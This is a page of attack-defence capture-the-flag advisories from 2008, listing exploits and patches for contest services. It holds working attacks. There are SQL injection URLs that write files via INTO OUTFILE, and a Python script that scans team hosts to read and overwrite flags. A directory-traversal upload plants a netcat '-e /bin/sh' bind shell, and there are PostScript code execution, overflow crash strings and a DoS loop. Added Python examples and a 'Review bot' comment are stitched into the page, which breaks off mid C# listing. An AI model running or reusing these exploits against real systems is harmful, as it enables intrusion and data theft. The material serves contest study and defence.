Judge tilo said: You are right. Wizards of DoS just forgot to subst. || by &&. Well, I still think they have detected the vuln.
 
Advisory
The patch sent:
Advisory from Wizards of DoS on Service brook3
 
Submitted at 21:12 01.08.2008
 
Scored by tilo with 5 scores.
 
Comment: "the first brook3 advisory. correct. very nice!"
 
has an error
 
Exploit
echo "10.1.x.3 10.1.y.3 0 CLR 0" | netcat 10.1.x.3 3333
echo "10.1.x.3 10.1.y.3 2 MOV 1" | netcat 10.1.x.3 3333
echo "10.1.x.3 10.1.w.3 4 MOV 1" | netcat 10.1.x.3 3333
 
"y" is a different client than "w"

"x" responds to w as if the game were with w and not with y.

if "y" sends later with the correct seqno, it responds too.

The game continues at the server with w
 
 
Patch
To patch the service it is necessary to do this:
 
substitute
if ( not (isFullCol (board game) (atoi dat))
&& (src == (client game) || (atoi seq == seqno game + 1)))
 
in the function bMOV
 
with
if ( not (isFullCol (board game) (atoi dat))
&& (src == (client game) && (atoi seq == (seqno game) + 1)))
 
The solution of the previous submission permits a third client to enter the game, using the correct game seqno. The other team's patch does not verify both conditions. With the or, if one is true the condition is true. Another client with the same sequence number can modify the game. You cannot modify the client number.
 
 
 
********************* Advisory 111, HackerDom on ghoSTFTP
 
Scored: 1
Submitted: 22:57:46 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge Lexi said: nice approach - though no real vuln
 
Advisory
ghoSTFTP is a minimalistic ftp-like daemon.
although the main part of the daemon is written in postscript, the connection is handled by an unknown binary file, which may contain unknown errors.
 
Exploit
Use the logging of the rewritten daemon to get acquainted with exploits used by other teams.
 
Patch
Rewrite the daemon according to RFC:
 
root@vulnbox:/home/ghoSTFTP# cat ghoSTFTP.pl
#!/usr/bin/perl

use IO::Socket;
my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
$MAXLEN = 1000000;
$PORTNO = 1025;
$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp')
    or die "socket: $@";
while ($sock->recv($newmsg, $MAXLEN)) {
    my($port, $ipaddr) = sockaddr_in($sock->peername);
    $hishost = gethostbyaddr($ipaddr, AF_INET);
    print "Client $hishost said ".ord($newmsg)." ``$newmsg''\n";

    $newmsg = substr($newmsg, 0, 128);
    my $cmd = ord(substr($newmsg, 0, 1));
    my $data = substr($newmsg, 1);
    if ($cmd == 1) {
        # read request
        if ($data =~ /^([^\0]+)\0$/) {
            $filename = $1;
            open F, $filename or goto ERROR;
            $answer = chr(2)."$filename\0".(join '', <F>);
            close F;
            $sock->send(substr($answer, 0, 128));
        }
    }
    elsif ($cmd == 3) {
        # write request
        if ($data =~ /^([^\0]+)\0(.*)$/) {
            $filename = $1;
            $content = $2;
            open F, ">$filename" or openError();
            print F $content;
            close F;
            $answer = chr(4)."$filename\0";
            close F;
            $sock->send(substr($answer, 0, 128));
        }
    } else {
        ERROR:
        $answer = chr(5)."ERROR\0";
        $sock->send(substr($answer, 0, 128));
    }
}
die "recv: $!";
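An added example, not the service's PostScript and not the team's Perl rewrite above: the same request format (opcode byte, filename, NUL, optional payload; 128-byte datagrams) handled in Python, with the allowlist from advisory 94's checkFilename applied before any file is touched. Traversal names, dot files such as .ls and .pi.ps, and *.ps uploads are refused with the protocol's error reply, and opcode 6 is not served at all (advisory 95). The in-memory dictionary stands in for the daemon's directory; the opcode numbering follows advisory 111's script.

```python
import re
from typing import Dict, NamedTuple

MAXLEN = 128                                  # datagram limit (advisories 108 and 111)
OP_READ, OP_DATA, OP_WRITE, OP_ACK, OP_ERROR = 1, 2, 3, 4, 5
# Opcode 6 (directory listing) is not in the RFC (advisory 95) and is not handled.
SAFE_NAME = re.compile(rb"[A-Za-z0-9]+")      # alphabet of advisory 94's checkFilename
ERROR_REPLY = bytes([OP_ERROR]) + b"ERROR\0"


class Request(NamedTuple):
    opcode: int
    filename: bytes
    payload: bytes


def parse_request(datagram: bytes) -> Request:
    """Parse <opcode><filename>NUL[<payload>]; raise ValueError on anything else."""
    if not 2 <= len(datagram) <= MAXLEN:
        raise ValueError("bad length")
    opcode = datagram[0]
    if opcode not in (OP_READ, OP_WRITE):
        raise ValueError("unsupported opcode %d" % opcode)
    name, sep, payload = datagram[1:].partition(b"\0")
    if not sep:
        raise ValueError("unterminated filename")
    if opcode == OP_READ and payload:
        raise ValueError("trailing bytes on read request")
    if not SAFE_NAME.fullmatch(name):
        # rejects "/../..", ".ls", ".pi.ps", "x.ps", empty names, ...
        raise ValueError("filename not in allowlist")
    return Request(opcode, name, payload)


def handle(datagram: bytes, files: Dict[bytes, bytes]) -> bytes:
    """Build the reply datagram for one request against an in-memory store."""
    try:
        req = parse_request(datagram)
    except ValueError:
        return ERROR_REPLY
    if req.opcode == OP_READ:
        if req.filename not in files:
            return ERROR_REPLY
        reply = bytes([OP_DATA]) + req.filename + b"\0" + files[req.filename]
        return reply[:MAXLEN]              # the service answers with at most one datagram
    # OP_WRITE: store the payload and acknowledge; nothing is ever executed
    files[req.filename] = req.payload
    return bytes([OP_ACK]) + req.filename + b"\0"
```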
 
 
********************* Advisory 115, n0 sp00n on ghoSTFTP
 
Scored: 2
Submitted: 23:13:35 1.8.2008
Published: 23:43:35 1.8.2008
 
Judge tilo said: hmm yes. But there are more possibilities...
 
Advisory
When requesting the file 3.1415, the file .pi.ps is run as postscript code.
 
 
Exploit
Create a malicious file .pi.ps on the server with opcode 2,
write a file 3.1415 with opcode 2 to execute .pi.ps
 
Patch
remove the (.pi.ps) run line
 
********************* Advisory 116, Flux Fingers on rapid graffiti
 
Scored: 1
Submitted: 23:22:01 1.8.2008
Published: 23:52:01 1.8.2008
 
Judge tilo said: ok, sql injection...
 
Advisory
the service rapid allows users to upload files and host their graffiti for free.
there is a SQLi in
rapid/ssl/forgot.php
 
[40] $result=mysql_query("SELECT question FROM pw WHERE usr='".$user."'");
39: $user=$_REQUEST['n'];
 
Exploit
an attacker can use the webbrowser to attack the service:
 
target/rapid/ssl/forgot.php?n=' and 1=0 union select column from table /*
 
also, there is the FILE privilege available for the standard users, so an attacker can write into files with INTO OUTFILE injection.
 
Patch
- 39: $user=$_REQUEST['n'];
 
+ 39: $user=mysql_real_escape_string($_REQUEST['n']);
 
********************* Advisory 119, in23canation on gabble
 
Scored: 1
Submitted: 23:25:53 1.8.2008
Published: 23:55:53 1.8.2008
 
Judge tilo said: exploit?
 
Advisory
it's possible to create htaccess files on the file system depending on the rights of the web server:
 
$filepath="files/".$id."/";
 
.....
 
$handle=fopen($filepath.".htaccess","w");
fwrite($handle,"Options +Indexes");
fclose($handle);
 
 
Exploit
 
 
Patch
$invalid = (strpos($id, '.') !== false) || ($id === '');
 
if ($invalid) {
echo "Invalid ID</font></h3>";
echo "<p>As an administrator you can try to fix the problem <a href='admin'>here</a>.</p>";
exit();
}
 
 
********************* Advisory 120, Flux Fingers on rapid graffiti
 
Scored: 1
Submitted: 23:28:03 1.8.2008
Published: 23:58:03 1.8.2008
 
Judge tilo said: one of the last sql injections i accept....
 
Advisory
Rapid Advisory
----------------
 
The service rapid allows users to upload files and host their graffiti for free.
There is a SQLi in the file "/home/rapid/ssl/login.php"
 
vulnerable lines:
----------------
 
[8] $result=mysql_query("SELECT pw FROM pw WHERE usr='".$login."'");
5: $login=$_REQUEST['login'];
 
The variable $login is not sanitized and given directly to an SQL query. Therefore, SQLinjection is possible.
 
 
Exploit
An attacker can use the webbrowser to attack the service:
 
http://target/rapid/ssl/login.php?pw=21312312&login=' or 1=1 INTO OUTFILE '/path/file.php' /*
 
We will use the FILE privilege, because we can't get the output of the query
 
 
Patch
- 5: $login=$_REQUEST['login'];
 
+ 5: $login=mysql_real_escape_string($_REQUEST['login']);
 
Make sure an attacker can't get out of the quotes with mysql_real_escape_string().
 
********************* Advisory 121, n0 sp00n on tagging
 
Scored: 4
Submitted: 23:30:42 1.8.2008
Published: 0:00:42 2.8.2008
 
Judge Lexi said: OMG - why did it take sooo long?
 
Advisory
Tagging allows deploying perl modules via the store function. Code in the uploaded module can then be executed via the autoloader magic.
 
 
Exploit
( echo "store exploit.pm" ; cat exploit.pm ) | netcat -u 10.1.x.3 5354
echo "exploit somefunction" | netcat -u 10.1.x.3 5354
 
 
Patch
--- a/store.pm
+++ b/store.pm
@@ -7,6 +7,9 @@ sub load {
sub init {
my ($self,$filename) = @_;
$filename =~ s/[^\\da-zA-Z\\.]//g;
+ if ($filename =~ s/\\.pmc?$/) {
+ return;
+ }
$self={};
print "store::init to $filename\
";
$self->{'filename'} = $filename;
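Review bot: `s/\.pmc?$/` is a substitution with no replacement part and no closing delimiter, so this hunk is a syntax error; a match was meant: `if ($filename =~ /\.pmc?$/)`. Blocking `.pm` and `.pmc` is still a blocklist; since store only needs to accept image names, matching an allowlist of permitted extensions is the safer check.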
 
********************* Advisory 123, ENOFLAG on ghoSTFTP
 
Scored: 3
Submitted: 23:44:35 1.8.2008
Published: 0:14:35 2.8.2008
 
Judge tilo said: You can get a lot of flags with this exploit :-)
 
Advisory
This is a resubmit.
It is possible to get directory listings via sending \x01.ls\x00 to ghoSTFTP. This file contains all files in the directory. By parsing this list and sending \x01<filename>\x00 it is possible to get the content of the listed files.
 
Disclaimer: the exploit is probably the ugliest hack ever, but it works and scans all ghoSTFTP flags of the other teams overwriting the file content with ENOFLAG then.
 
Vulnerable code:
 
 
Exploit
#!/usr/bin/env python

import socket, sys
import re

socket.setdefaulttimeout(5)
file = []

def sendWrite(s, filename, data):
    data = '\x03%s\x00%s' % (filename, data)
    s.send(data)
    (d, a) = s.recvfrom(MAXLEN)

def sendRead(s, filename):
    foo = []
    r = re.compile('.*[a-zA-Z0-9]+.*')
    data = '\x01%s\x00 ' % filename
    s.send(data)
    (d, a) = s.recvfrom(MAXLEN)
    for i in d.rsplit('\n')[1:]:
        if r.match(i):
            file.append(i)
            print 'file found', i

    return d

MAXLEN = 128

for i in xrange(1,33):
    cip = '10.1.%d.3' %(i)

    print 'connecting to %s' %(cip)

    addr = (cip, 1025)
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(addr)
        sendRead(s, '.ls')
    except:
        continue

    for i in file:
        print sendRead(s, i)
        sendWrite(s, i, "ENOFLAG")
 
 
Patch
/filehandler (.ls) (a) file def
=>
/filehandler (.lshardtoguessfilenameqwdwqdwqdwqdqwdqwdqwdqw) (a) file def
 
 
********************* Advisory 124, SYPER on gabble
 
Scored: 1
Submitted: 23:48:08 1.8.2008
Published: 0:18:08 2.8.2008
 
Judge tilo said: just another segfault.... Inject payload!!
 
Advisory
buffer overflow in database.c (with function pointer overwrite)
 
int dbGetStatus(char* status, char* user) {
MYSQL_RES *res;
MYSQL_ROW row;
int (*ptr) (char* usr);
ptr = &dbUserExists;
char query[QUERYLEN];
 
sprintf(query,"SELECT status FROM users WHERE name='%s'",user);
 
Exploit
./gabbler <addr> -e `perl -e 'print "\x0d","a"x2000'`
 
 
Patch
Before sprintf :
if(strlen(password) > 60) { return 0; }
if(strlen(user) > 60) { return 0; }
 
********************* Advisory 125, HackerDom on ghoSTFTP
 
Scored: 4
Submitted: 0:01:24 2.8.2008
Published: 0:31:24 2.8.2008
 
Judge tilo said: Very nice! (if the exploit works. I did not test it).
 
Advisory
ghosti is a simple FTP-like daemon written in PostScript.
If the uploaded file is a ps file, it executes it.
 
Exploit:
 
 
Patch:
 
See patch in previous advisories
 
Exploit
upload such ps file:
/fileIndex exch def
/scratch 128 string def
/i 0 def
(*) {
/filename exch def
i fileIndex eq {
filename send
quit
} if
/i i 1 add def
} scratch filenameforall
stdout (We're done here.) writestring
 
It sends a filename, which can be read after that in order to get the flag.
 
Here is the script:
 
#!/usr/bin/perl

use Socket;

sub snd {
    my ($MSG) = @_;
    socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname("udp")) or die "socket: $!";

    $HOSTNAME = $ARGV[0];
    #$HOSTNAME = 'localhost';
    $PORTNO = 1025;
    $MAXLEN = 128;

    $ipaddr = inet_aton($HOSTNAME);
    $portaddr = sockaddr_in($PORTNO, $ipaddr);

    send(SOCKET, $MSG, 0, $portaddr) == length($MSG) or die "cannot send to $HOSTNAME($PORTNO): $!";
    $portaddr = recv(SOCKET, $MSG, $MAXLEN, 0) or die "recv: $!";
    ($portno, $ipaddr) = sockaddr_in($portaddr);
    $host = gethostbyaddr($ipaddr, AF_INET);
    print "$host($portno) :$MSG\n";
    print "hd: ";
    for $x (split '', $MSG) {
        printf ("%.2X(%s) ", ord($x), $x);
    }
    print "\n";
}

# read a file: opcode 1, filename, NUL
sub rd {
    my ($f) = @_;
    snd(chr(1)."$f\0");
}

# write a file: opcode 3, filename, NUL, content
sub wr {
    my ($f, $s) = @_;
    snd(chr(3)."$f\0$s");
}

if (@ARGV == 1) {
    wr("xxx.ps", "/fileIndex exch def
/scratch 128 string def
/i 0 def
(*) {
/filename exch def
i fileIndex eq {
filename send
quit
} if
/i i 1 add def
} scratch filenameforall
stdout (We're done here.) writestring");
} else {
    rd ($ARGV[1]);
}
 
 
Patch
remove execution of ps function
 
********************* Advisory 126, teamSparta on gabble
 
Scored: 1
Submitted: 0:04:10 2.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: union...
 
Advisory
It is possible to retrieve all flags in offlinemessages with a UNION statement. The difficulty here is the check if the SQL injection parameter is already present, hence an escaped version must be added beforehand.
 
Exploit
import socket

# create_packet(), rndname(), the OPCODE_* constants and address come from the
# team's own client and are not reproduced on this page.
query = "' UNION SELECT message from offlinemessages where ''='"
escquery = query.replace("'", "\\'")   # escaped copy, so the existence check finds the name
buddy = escquery
name = rndname()

bsck = socket.socket()
bsck.settimeout(5.0)
bsck.connect( (address, 4000) )
bsck.send( create_packet(OPCODE_NEWUSER, [ escquery, '11.01.24.04' ]) )
bsck.close()

sck = socket.socket()
sck.settimeout(2.0)
sck.connect( (address, 4000) )

sck.send( create_packet(OPCODE_NEWUSER, [ name, '???' ] ) )
sck.recv(1024)

sck.send( create_packet(OPCODE_GETOFFLINE, [ query] ) )
 
 
Patch
database.c:364
 
if(strstr(query, "UNION"))
{
puts("UNION!!!");
return -1;
}
 
 
********************* Advisory 128, Flux Fingers on brook3
 
Scored: 2
Submitted: 0:08:18 2.8.2008
Published: 0:38:18 2.8.2008
 
Judge tilo said: Okay, better than the default implementation :-)
 
Advisory
Creating a simple AI. Please pardon our bad Haskell skills, it was our first time ;)
 
 
Exploit
Our AI first checks whether it could win by putting a coin in one of the 8 columns, using the function "winner".
If it cannot win, it checks whether the opponent could win with his next turn. If that's the case, it tries to prevent this by putting a coin into the first column where "winner" doesn't return "Nobody".
If none of the above is the case, the AI picks the first non-full column to put the coin in.
 
Patch
calcNextMove :: Game -> Board -> String -> IO Int
calcNextMove game board seq = do
  if isFullBoard board
   then do
    -- return 0 if no move is possible because the board is full
    return 0
   else do
    -- check if oneself can win
    if ( not ((winner (makeMove game 1 (atoi(seq)))) == Nobody))
     then do
      return 1
     else do
      if ( not ((winner (makeMove game 2 (atoi(seq)))) == Nobody))
       then do
        return 2
       else do
        if ( not ((winner (makeMove game 3 (atoi(seq)))) == Nobody))
         then do
          return 3
         else do
          if ( not ((winner (makeMove game 4 (atoi(seq)))) == Nobody))
           then do
            return 4
           else do
            if ( not ((winner (makeMove game 5 (atoi(seq)))) == Nobody))
             then do
              return 5
             else do
              if ( not ((winner (makeMove game 6 (atoi(seq)))) == Nobody))
               then do
                return 6
               else do
                if ( not ((winner (makeMove game 7 (atoi(seq)))) == Nobody))
                 then do
                  return 7
                 else do
                  if ( not ((winner (makeMove game 8 (atoi(seq)))) == Nobody))
                   then do
                    return 8
                   else do
                    -- check if opponent could win with next move
                    if ( not ((winner (makeMove game 1 (atoi(seq)+1))) == Nobody))
                     then do
                      return 1
                     else do
                      if ( not ((winner (makeMove game 2 (atoi(seq)+1))) == Nobody))
                       then do
                        return 2
                       else do
                        if ( not ((winner (makeMove game 3 (atoi(seq)+1))) == Nobody))
                         then do
                          return 3
                         else do
                          if ( not ((winner (makeMove game 4 (atoi(seq)+1))) == Nobody))
                           then do
                            return 4
                           else do
                            if ( not ((winner (makeMove game 5 (atoi(seq)+1))) == Nobody))
                             then do
                              return 5
                             else do
                              if ( not ((winner (makeMove game 6 (atoi(seq)+1))) == Nobody))
                               then do
                                return 6
                               else do
                                if ( not ((winner (makeMove game 7 (atoi(seq)+1))) == Nobody))
                                 then do
                                  return 7
                                 else do
                                  if ( not ((winner (makeMove game 8 (atoi(seq)+1))) == Nobody))
                                   then do
                                    return 8
                                   else do
                                    -- if no one can win with next move, pick a different line
                                    if (not (isFullCol board 1))
                                     then do
                                      return 1
                                     else do
                                      if (not (isFullCol board 2))
                                       then do
                                        return 2
                                       else do
                                        if (not (isFullCol board 3))
                                         then do
                                          return 3
                                         else do
                                          if (not (isFullCol board 4))
                                           then do
                                            return 4
                                           else do
                                            if (not (isFullCol board 5))
                                             then do
                                              return 5
                                             else do
                                              if (not (isFullCol board 6))
                                               then do
                                                return 6
                                               else do
                                                if (not (isFullCol board 7))
                                                 then do
                                                  return 7
                                                 else do
                                                  if (not (isFullCol board 8))
                                                   then do
                                                    return 8
                                                   else do
                                                    return 0
 
********************* Advisory 130, SYPER on brook3
 
Scored: 4
Submitted: 0:12:04 2.8.2008
Published: 0:42:04 2.8.2008
 
Judge tilo said: Wow, finally somebody found this. Cool. (I think your alternative way of patching would be much easier)
 
Advisory
The function bERR does not validate whether the seqno is numeric: when the `if (isNumeric seq)` at line 130 of brook3.hs fails, the else branch calls bERR socket hostname game, and this function does not validate seqno and uses atoi(seq).
If we send a char we will break the server.
 
The function isNum is also bad: it says x=='O' is a number. You can modify this function too.
 
Exploit
echo "localhost localhost i CLR i" | ./netcat 10.1.y.3 3333
 
this breaks the server at 10.1.y.3
 
Patch
Replace, in the else branch, the bERR function by bERR2, which does not use the param seq.
 
if (isNumeric seq)
  then do
    -- further action depends on received packet type
    case opc of
      "CLR" -> bCLR socket hostname params game
      "MOV" -> bMOV socket hostname params game
      "OKY" -> bERR socket hostname params game
      "ERR" -> bERR socket hostname params game
      _     -> bERR socket hostname params game
  else do
    -- sequence number not numeric
    bERR2 socket hostname game
else do
 
********************* Advisory 131, Squareroots on tagging
 
Scored: 2
Submitted: 0:17:18 2.8.2008
Published: 0:47:18 2.8.2008
 
Judge Lexi said: oh, this really took long to discover :)
 
Advisory
One can download the SQLite file in order to extract the filenames from the database. One can then download the pictures. Those can then be "analysed" and submitted.
 
Exploit
for team in `seq 1 32`; do echo "retrieve ms-sql-simulation.db" | nc -w 1 -u 10.1.$team.3 5354 > db$team.db; done
 
then run db.pl =>
 
 
#!/usr/bin/perl -w
use DBI;

my $team = shift || exit;

if (!-s "db".$team.".db") { exit; }

$dbh = DBI->connect("dbi:SQLite:dbname=db".$team.".db") || die("bla");

@res = $dbh->selectall_arrayref("SELECT jpeg FROM tag");
foreach (@res) {
    foreach (@$_) {
        foreach (@$_) {
            if (!-f $_) {
                system("echo 'retrieve ".$_."' | nc -w 1 -u 10.1.".$team.".3 5354 > ".$_);
                if (!-s $_) { unlink($_); }
                print $_."\n";
            }
        }
    }
}
 
 
Patch
return if ($filename =~ /\.db/);
in retrieve::init
 
********************* Advisory 132, Wizards of DoS on brook3
 
Scored: 3
Submitted: 0:18:54 2.8.2008
Published: 0:48:54 2.8.2008
 
Judge tilo said: Okay, the best solution I have seen yet.
 
Advisory
There have been 2 AIs successively in our code. The first one was rather dumb and just tried to fill the columns starting with column 1. The second searches for neighbours to fill up lines, ...
 
You'll find the logic in the functions
mYnextfree :: Board -> Int -> IO Int
and
mYfindneighbour :: Player -> Board -> IO Int
 
 
Exploit
see patch
 
Patch
-- | ARTIFICIAL INTELLIGENCE
-- This is a quite simple AI engine which just selects a random column. Beside increasing
-- the security of this service, it is your job to improve the AI engine to win matches.

calcNextMove :: Player -> Board -> IO Int
calcNextMove player board = do
  if isFullBoard board
    then do
      -- return 0 if no move is possible because the board is full
      return 0
    else do
      -- otherwise determine a random column
      mYfindneighbour player board


mYnextfree :: Board -> Int -> IO Int
mYnextfree board i
  | (isFullCol board i) = (mYnextfree board (i+1))
  | otherwise           = return i

-- positively find a good place for a line
-- pity it is static in its preference
mYfindneighbour :: Player -> Board -> IO Int
mYfindneighbour player board =
  return (hasneighbour (1,topOfCol board 1))
  where
    hasneighbour :: Point -> Int
    hasneighbour (x,y)
      | (x > 1) && getField board (x-1,y) == (Just player) = x
      | (y > 1) && getField board (x,y-1) == (Just player) = x
      | (x < cols) && getField board (x+1,y-1) == (Just player) = x
      | (x > 1) && (y < 1) && getField board (x-1,y-1) == (Just player) = x
      | (x < cols) && (y < 1) && getField board (x+1,y-1) == (Just player) = x
      | x > cols = 4
      | otherwise = hasneighbour (x+1,topOfCol board x)
 
 
********************* Advisory 133, Defender of the Flag on brook3
 
Scored: 1
Submitted: 0:23:29 2.8.2008
Published: 0:53:29 2.8.2008
 
Judge tilo said: very simple improvement
 
Advisory
The AI of brook3 is very poor... The player randomly chooses a column to put his stones into. At this point you could code a better AI.
 
Exploit
calcNextMove :: Player -> Board -> IO Int
calcNextMove player board = do
  if isFullBoard board
    then do
      -- return 0 if no move is possible because the board is full
      return 0
    else do
      -- otherwise determine a random column
      g <- newStdGen
      let randno = head (randomRs (1,cols) g::[Int]) in
        if (isFullCol board randno) then do
          -- calculate a new column
          -- if it is full
          calcNextMove player board
        else do
          -- otherwise return this
          -- column
          return randno

(The return randno line will be our AI)
 
Patch
calcNextMove :: Player -> Board -> IO Int
calcNextMove player board = do
  if isFullBoard board
    then do
      -- return 0 if no move is possible because the board is full
      return 0
    else do
      -- otherwise determine a random column
      g <- newStdGen
      let randno = head (randomRs (1,cols) g::[Int]) in
        if (isFullCol board randno) then do
          -- calculate a new column
          -- if it is full
          calcNextMove player board
        else do
          -- otherwise return this
          -- column
          return 2

(We return "line 2" to the gameserver to put our stone into line 2 with every move. If the opponent puts his stones randomly, our chance of making 3 stones in a vertical row is much higher!)
 
 
********************* Advisory 136, ENOFLAG on (General Fault)
 
Scored: 2
Submitted: 0:44:12 2.8.2008
Published: 1:14:12 2.8.2008
 
Judge Lexi said: nice
 
Advisory
/home is owned by the ghoSTFTP user, and ghoSTFTP is vulnerable to a directory traversal which allows uploading files to /home by sending a file to ../.
 
The interesting thing is that (/etc/apache2/conf.d/myspray.conf) the apache configuration for the myspray service sets the PythonHome to /home.
 
<Location "/myspray">
...
PythonPath "sys.path + ['/home/'] "
...
</Location>
 
So if you upload Python code to /home via the broken ghoSTFTP and then request myspray, you can execute arbitrary Python code.
 
Exploit
# Python 2 script (print statement, xrange)
import socket, sys

bla = open('foo.py').read()

def sendWrite(s, filename, data):
    data = '\x03%s\x00%s' % (filename, data)
    s.send(data)
    (d, a) = s.recvfrom(MAXLEN)
    print d

MAXLEN = 128
for i in xrange(17,18):

    cip = '10.1.%d.35' %(i)

    print 'connecting to %s' %(cip)

    addr = (cip, 1025)
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(addr)
    except:
        continue

    # "../os.py" escapes the ghoSTFTP directory and lands in /home
    sendWrite(s, '../os.py', bla)


foo.py:
#!/usr/bin/env python
import os
os.system('netcat -v -l -p 65344 -e /bin/sh')
 
 
 
Patch
<Location "/myspray">
...
PythonPath "sys.path + ['/home/'] "
...
</Location>
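
The read/write/listing exchange that advisories 123, 125 and 136 drive over UDP port 1025, rebuilt as an added example in Python; it is not part of any team's submission and not the ghoSTFTP daemon's code. It parses the \x01<name>\x00 (read) and \x03<name>\x00<data> (write) datagrams the exploits send and adds the path-containment check that would have rejected the ../os.py upload from advisory 136. The in-memory store, the "ls" header line in the listing, the error strings and the default root /home/ghoSTFTP are assumptions, not the daemon's real behaviour.

```python
import os

OP_READ, OP_WRITE = 1, 3   # opcodes as the exploits on this page send them
LISTING = ".ls"            # magic name that returns the directory listing


def parse_request(datagram):
    """Split one ghoSTFTP datagram into (opcode, filename, payload).

    Layout as the exploits build it: opcode byte, filename, NUL, then (for
    writes) the file content.  Raises ValueError on malformed input.
    """
    if len(datagram) < 2:
        raise ValueError("datagram too short")
    opcode = datagram[0]
    name, sep, payload = datagram[1:].partition(b"\x00")
    if not sep:
        raise ValueError("filename is not NUL-terminated")
    return opcode, name.decode("latin-1"), payload


def resolve_inside(root, name):
    """Absolute path of `name` inside `root`, or None if it would escape.

    realpath() collapses '..' components (and follows symlinks that exist),
    so the decision is made on the final path, not on the raw string.
    """
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, name))
    if target == root or not target.startswith(root + os.sep):
        return None
    return target


class GhostStore:
    """Tiny in-memory model of the daemon's file area (no sockets, runs offline).

    Assumption: file names in the listing are relative to the root directory.
    """

    def __init__(self, root="/home/ghoSTFTP"):
        self.root = os.path.realpath(root)
        self.files = {}   # absolute path -> bytes

    def handle(self, datagram):
        opcode, name, payload = parse_request(datagram)
        if opcode == OP_READ and name == LISTING:
            # advisory 123's exploit skips the first line, so a header is assumed
            names = sorted(os.path.relpath(p, self.root) for p in self.files)
            return ("ls\n" + "\n".join(names)).encode("latin-1")
        path = resolve_inside(self.root, name)
        if path is None:
            return b"ERR path escapes " + self.root.encode()
        if opcode == OP_READ:
            return self.files.get(path, b"ERR no such file")
        if opcode == OP_WRITE:
            # Only store the bytes; an uploaded .ps file is never handed to the
            # PostScript interpreter (the problem advisory 125 reports).
            self.files[path] = payload
            return b"OK"
        return b"ERR unknown opcode"


if __name__ == "__main__":
    store = GhostStore()
    print(store.handle(b"\x03flag.txt\x00ENOFLAG"))
    print(store.handle(b"\x01.ls\x00"))
    print(store.handle(b"\x03../os.py\x00import os"))
```

resolve_inside() is the one piece to keep: comparing the resolved path against the resolved root catches "../os.py", absolute names and symlink tricks alike, which a filter on the characters of the name does not.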
 
********************* Advisory 137, SYPER on gabble
 
Scored: 1
Submitted: 0:45:00 2.8.2008
Published: 1:15:00 2.8.2008
 
Judge Lexi said: ok
 
Advisory
Another buffer overflow. opcode 15
 
int dbGetAwayMessage(char* awaymessage, char* user) {
MYSQL_RES *res;
MYSQL_ROW row;
unsigned short int len = strlen(user)+65500;
int (*ptr) (char* usr);
ptr = &dbUserExists;
char query[len];
 
sprintf(query,"SELECT awaymessage FROM users WHERE name='%s'",user);
 
Exploit
./gabbler <addr> -e `perl -e 'print "\x0f","a"x2000'`
 
Patch
Before sprintf :
if(strlen(user) > 60) { return 0; }
 
********************* Advisory 138, HackerDom on tagging
 
Scored: 1
Submitted: 0:48:47 2.8.2008
Published: 1:18:47 2.8.2008
 
Judge Lexi said: DoS is boring
 
Advisory
tagging is a daemon which handles commands.
 
There is a possibility of DOS attack.
 
For each command tagging tries to init the module which is the first word in the command. If init was successful we try to run sub idle no matter whether there is such a function in the module or not. In the case of mickeysoft_sequel there is an init but no idle. So the daemon crashes.
 
Exploit
#!/usr/bin/perl
`echo mickeysoft_sequel > 1.txt`;
while(1)
{
    $a='nc -u -w 1 10.1';
    $b='3 5354 < 1.txt';
    # inside backticks the dots are literal: "nc -u -w 1 10.1.<n>.3 5354 < 1.txt"
    `$a.$_.$b` for 1..30;
}
 
Patch
Use "eval {}" when you try to call $foo->idle()
 
********************* Advisory 140, HackerDom on rapid graffiti
 
Scored: 5
Submitted: 0:55:21 2.8.2008
Published: 1:25:21 2.8.2008
 
Judge tilo said: WTF?? We embedded the flags with steghide!
 
Advisory
Flags in this service are stored as images.
Well, it's simple to write a program which takes a flag from the image.
 
Exploit
Written in C#
 
using System;
using System.Collections.Generic;
using System.Windows.Forms;
using System.Drawing;
using System.IO;
 
namespace getContent
{
static class getImage
{
/// <summary>
/// The main entry point for the application.
/// </summary>
[STAThread]
 
 
 
 
 
static void Main()
{
 
string[] arguments = Environment.GetCommandLineArgs();
 
if (arguments.Length != 2)
{
System.Console.WriteLine("Usage: getImage.exe image.jpg");
Environment.Exit(1);
}
String filename = arguments[1];
Bitmap image = (Bitmap)(Image.FromFile(filename));
 
for (int i = 0; i < image.Width; i++)
{
for (int j = 0; j < image.Height; j++)
{
 
Color pixel = image.GetPixel(i, j);
if (pixel.GetBrightness() > 0.65)
{
image.SetPixel(i, j, Color.White);
}
else
image.SetPixel(i, j, Color.Black);
}
}
 
 
DirectoryInfo di = new DirectoryInfo("chars");
FileInfo[] rgFiles = di.GetFiles("*.jpg");
int lineNum = -1;
foreach (FileInfo fi in rgFiles)
{
Bitmap charImage = (Bitmap)(Image.FromFile("chars/" + fi.Name));
 
int newline = getStringNum(image, charImage);
if (newline == lineNum && newline != -1)
break;
if (newline != -1)
lineNum = newline;
 
}
 
 
 
//get section
 
Rectangle section = new Rectangle(0, 0, image.Width, 12);
Bitmap sectionImg = new Bitmap(section.Width, section.Height);
Graphics g = Graphics.FromImage(sectionImg);
g.DrawImage(image, 0, -lineNum);
 
 
 
 
//let's find the horisontal offset
 
 
int rowNum = -1;
int rowDist = 100000000;
 
foreach (FileInfo fi in rgFiles)
{
Bitmap charImage = (Bitmap)(Image.FromFile("chars/" + fi.Name));
 
int[] tuple = getRowNum(sectionImg, charImage);
 
if (tuple[1] < rowDist)
{
rowDist = tuple[1];
rowNum = tuple[0];
}
 
 
}
 
//get the stripe
 
 
section = new Rectangle(0, 0, 9*32, 12);
sectionImg = new Bitmap(section.Width, section.Height);
g = Graphics.FromImage(sectionImg);
g.DrawImage(image, -rowNum, -lineNum);
 
 
 
 
 
 
 
for (int i = 0; i < 32; i++)
{
int minDist = 100000;
String name = "";
foreach (FileInfo fi in rgFiles)
{
Bitmap charImage = (Bitmap)(Image.FromFile("chars/" + fi.Name));
 
Image singleChar = new Bitmap(10, 12);
Graphics gg = Graphics.FromImage(singleChar);
gg.DrawImage(sectionImg, -i * 9, 0);
 
int distance = getDistance(sectionImg, charImage, i*9, 0);
if (distance < minDist)
